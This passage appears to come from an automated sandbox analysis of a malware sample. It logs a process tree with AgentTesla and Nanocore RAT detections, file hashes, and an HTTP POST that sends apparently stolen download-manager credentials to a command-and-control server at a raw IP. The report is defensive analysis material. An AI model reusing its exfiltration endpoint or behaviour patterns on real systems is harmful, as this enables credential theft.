                              Connection: Keep-Alive
                              Content-Type: image/jpeg
                              Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 06 00 00 00 0c 00 06 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 20 00 79 00 6c 00 62 00 6d 00 65 00 73 00 73 00 41 00 01 00 0e 00 44 00 00 00 39 00 32 00 37 00 33 00 2e 00 31 00 38 00 31 00 38 00 2e 00 30 00 2e 00 31 00 00 00 6e 00 6f 00 69 00 73 00 72 00 65 00 56 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 0e 00 40 00 00 00 00 00 00 00 00 00 65 00 6d 00 61 00 4e 00 74 00 63 00 75 00 64 00 6f 00 72 00 50 00 01 00 01 00 22 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a 00 63 00 62 00 67 00 77 00 4d 00 00 00 65 00 6d 00 61 00 6e 00 65 00 6c 00 69 00 46 00 6c 00 61 00 6e 00 69 00 67 00 69 00 72 00 4f 00 01 00 15 00 52 00 00 00 00 00 00 00 00 00 73 00 6b 00 72 00 61 00 6d 00 65 00 64 00 61 00 72 00 54 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 2a 00 00 00 00 00 00 00 74 00 68 00 67 00 69 00 72 00 79 00 70 00 6f 00 43 00 6c 00 61 00 67 00 65 00 4c 00 01 00 01 00 26 00 00 00 00 00 6c 00 6c 00 64 00 2e 00 72 00 73 00 70 00 7a 00 71 00 73 00 78 00 64 00 72 00 61 00 7a
                              Data Ascii: 19273.1818.0.1noisreV ylbmessAD9273.1818.0.1noisreVtcudorP@emaNtcudorP"lld.rspzqsxdrazcbgwMemaneliFlanigirORskramedarTlageL*thgirypoClageL&lld.rspzqsxdraz


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              7192.168.2.34976845.133.1.4180C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              TimestampkBytes transferredDirectionData
                              May 27, 2022 13:25:27.451658010 CEST3752OUTPOST /jah/inc/9f3d37faadd0a5.php HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
                              Content-Type: application/x-www-form-urlencoded
                              Host: 45.133.1.41
                              Content-Length: 580
                              Expect: 100-continue
                              Connection: Keep-Alive
                              May 27, 2022 13:25:27.479573965 CEST3752INHTTP/1.1 100 Continue
                              May 27, 2022 13:25:27.544449091 CEST3753INHTTP/1.1 200 OK
                              Date: Fri, 27 May 2022 11:25:27 GMT
                              Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.2
                              X-Powered-By: PHP/8.1.2
                              Content-Length: 538
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/html; charset=UTF-8
                              Data Raw: 5b 5b 22 49 6e 74 65 72 6e 65 74 20 44 6f 77 6e 6c 6f 61 64 20 4d 61 6e 61 67 65 72 22 2c 22 68 74 74 70 73 3a 2f 2f 67 71 62 6d 77 73 77 42 61 79 2e 6f 72 67 22 2c 22 54 57 44 33 51 22 2c 22 4b 73 78 30 6c 5a 64 46 6b 79 57 74 41 62 76 22 5d 2c 5b 22 4a 44 6f 77 6e 6c 6f 61 64 65 72 22 2c 22 0a 70 4f 69 46 48 78 6a 6f 68 70 6a 64 65 73 45 2e 22 2c 22 25 30 41 54 43 56 65 42 46 48 68 79 6f 54 37 38 42 58 22 2c 22 25 30 41 68 68 31 39 7a 38 76 67 71 36 44 36 22 5d 5d 3c 62 72 20 2f 3e 0a 3c 62 3e 46 61 74 61 6c 20 65 72 72 6f 72 3c 2f 62 3e 3a 20 20 55 6e 63 61 75 67 68 74 20 54 79 70 65 45 72 72 6f 72 3a 20 73 69 7a 65 6f 66 28 29 3a 20 41 72 67 75 6d 65 6e 74 20 23 31 20 28 24 76 61 6c 75 65 29 20 6d 75 73 74 20 62 65 20 6f 66 20 74 79 70 65 20 43 6f 75 6e 74 61 62 6c 65 7c 61 72 72 61 79 2c 20 6e 75 6c 6c 20 67 69 76 65 6e 20 69 6e 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3a 31 32 37 0a 53 74 61 63 6b 20 74 72 61 63 65 3a 0a 23 30 20 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 3a 20 65 76 61 6c 28 29 0a 23 31 20 7b 6d 61 69 6e 7d 0a 20 20 74 68 72 6f 77 6e 20 69 6e 20 3c 62 3e 43 3a 5c 78 61 6d 70 70 5c 68 74 64 6f 63 73 5c 6a 61 68 5c 69 6e 63 5c 39 66 33 64 33 37 66 61 61 64 64 30 61 35 2e 70 68 70 28 31 32 29 20 3a 20 65 76 61 6c 28 29 27 64 20 63 6f 64 65 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 31 32 37 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                              Data Ascii: [["Internet Download Manager","https://gqbmwswBay.org","TWD3Q","Ksx0lZdFkyWtAbv"],["JDownloader","pOiFHxjohpjdesE.","%0ATCVeBFHhyoT78BX","%0Ahh19z8vgq6D6"]]<br /><b>Fatal error</b>: Uncaught TypeError: sizeof(): Argument #1 ($value) must be of type Countable|array, null given in C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12) : eval()'d code:127Stack trace:#0 C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12): eval()#1 {main} thrown in <b>C:\xampp\htdocs\jah\inc\9f3d37faadd0a5.php(12) : eval()'d code</b> on line <b>127</b><br />


                              Click to jump to process

                              Target ID:0
                              Start time:13:23:18
                              Start date:27/05/2022
                              Path:C:\Users\user\Desktop\TM57812337.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\TM57812337.exe"
                              Imagebase:0x110000
                              File size:25088 bytes
                              MD5 hash:DE791F645B2235DCE3572C7C5961E17B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000000.00000002.360544284.00000000052C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.360421539.0000000003637000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.360421539.0000000003637000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.360358801.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.360358801.00000000035A8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low

                              Target ID:7
                              Start time:13:23:42
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                              Imagebase:0xc20000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:8
                              Start time:13:23:42
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:9
                              Start time:13:23:43
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\timeout.exe
                              Wow64 process (32bit):true
                              Commandline:timeout 10
                              Imagebase:0xe30000
                              File size:26112 bytes
                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:12
                              Start time:13:23:54
                              Start date:27/05/2022
                              Path:C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Temp\Qqsucntzxgqwkiqkvrafiufflip.exe"
                              Imagebase:0xb20000
                              File size:25088 bytes
                              MD5 hash:9E72E89826413EA6BA69E1F3907E9901
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 0000000C.00000002.476919142.0000000005CD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.475784725.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.476158261.0000000003F05000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.476008629.0000000003E66000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.475883360.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 69%, ReversingLabs
                              Reputation:low

                              Target ID:14
                              Start time:13:24:02
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Imagebase:0xc50000
                              File size:41064 bytes
                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.357836430.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.356252720.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.356252720.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.356883933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.356883933.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.489012669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000002.489012669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000000.355643671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000E.00000000.355643671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.490929269.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              Target ID:15
                              Start time:13:24:04
                              Start date:27/05/2022
                              Path:C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                              Imagebase:0xe80000
                              File size:25088 bytes
                              MD5 hash:DE791F645B2235DCE3572C7C5961E17B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.490555002.0000000004417000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.490555002.0000000004417000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.490354545.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.490354545.0000000004388000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.489735823.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000F.00000002.489735823.00000000033A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 0000000F.00000002.491110453.00000000061C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 27%, ReversingLabs
                              Reputation:low

                              Target ID:16
                              Start time:13:24:14
                              Start date:27/05/2022
                              Path:C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Local\Ujxomvdv\Qjarsxlh.exe"
                              Imagebase:0x6d0000
                              File size:25088 bytes
                              MD5 hash:DE791F645B2235DCE3572C7C5961E17B
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.507868874.0000000002B34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.508036499.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.508036499.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000010.00000002.508484748.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.508115512.0000000003B87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000010.00000002.508115512.0000000003B87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low

                              Target ID:17
                              Start time:13:24:36
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                              Imagebase:0xc20000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:18
                              Start time:13:24:37
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:19
                              Start time:13:24:37
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\timeout.exe
                              Wow64 process (32bit):true
                              Commandline:timeout 10
                              Imagebase:0xe30000
                              File size:26112 bytes
                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Target ID:20
                              Start time:13:24:39
                              Start date:27/05/2022
                              Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                              Imagebase:0xbe0000
                              File size:41064 bytes
                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:.Net C# or VB.NET
                              Antivirus matches:
                              • Detection: 0%, Metadefender, Browse
                              • Detection: 0%, ReversingLabs
                              Reputation:high

                              Target ID:21
                              Start time:13:24:40
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:22
                              Start time:13:24:40
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                              Imagebase:0xc20000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:23
                              Start time:13:24:41
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:25
                              Start time:13:24:41
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\timeout.exe
                              Wow64 process (32bit):true
                              Commandline:timeout 10
                              Imagebase:0xe30000
                              File size:26112 bytes
                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:27
                              Start time:13:24:47
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout 10
                              Imagebase:0xc20000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:28
                              Start time:13:24:48
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:29
                              Start time:13:24:48
                              Start date:27/05/2022
                              Path:C:\Users\user\AppData\Roaming\excel\excel.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\excel\excel.exe"
                              Imagebase:0xf70000
                              File size:41064 bytes
                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:.Net C# or VB.NET

                              Target ID:30
                              Start time:13:24:49
                              Start date:27/05/2022
                              Path:C:\Windows\SysWOW64\timeout.exe
                              Wow64 process (32bit):true
                              Commandline:timeout 10
                              Imagebase:0xe30000
                              File size:26112 bytes
                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:31
                              Start time:13:24:49
                              Start date:27/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7c9170000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language

                              Target ID:32
                              Start time:13:24:57
                              Start date:27/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Imagebase:0xbd0000
                              File size:41064 bytes
                              MD5 hash:EFEC8C379D165E3F33B536739AEE26A3
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                              • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000020.00000002.491043035.0000000006090000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000000.473733509.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.490004111.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000000.472431522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: NanoCore, Description: unknown, Source: 00000020.00000002.488350765.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000020.00000000.472817757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
